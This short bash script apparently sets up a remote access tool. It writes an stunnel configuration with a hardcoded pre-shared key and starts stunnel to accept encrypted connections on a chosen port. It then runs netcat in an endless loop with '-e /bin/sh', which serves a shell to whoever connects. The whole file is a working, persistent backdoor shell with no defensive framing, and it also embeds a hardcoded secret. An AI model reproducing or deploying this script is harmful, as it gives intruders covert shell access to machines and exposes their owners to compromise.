#!/bin/bash

if [ $# -ne 1 ];
then
    echo -e "\n\tUsage: <listen-port>\n"
    exit -1
fi

NETCAT="/home/ssem/work/rats/nc/netcat-0.7.1/src/netcat"
#NETCAT=$(which nc)
LISTEN_PORT=$1
LISTEN_PASSWD="test1:oaP4EishaeSaishei6rio6xeeph3az"
RAT_PORT=63987

echo "$LISTEN_PASSWD" > server.psk
echo "[PSK server]" > server.conf
echo "accept = $LISTEN_PORT" >> server.conf
echo "connect = $RAT_PORT" >> server.conf
echo "ciphers = PSK" >> server.conf
echo "PSKsecrets = server.psk" >> server.conf

stunnel server.conf
while true; do
    $NETCAT -l -s 127.0.0.1 -p $RAT_PORT -e /bin/sh
done
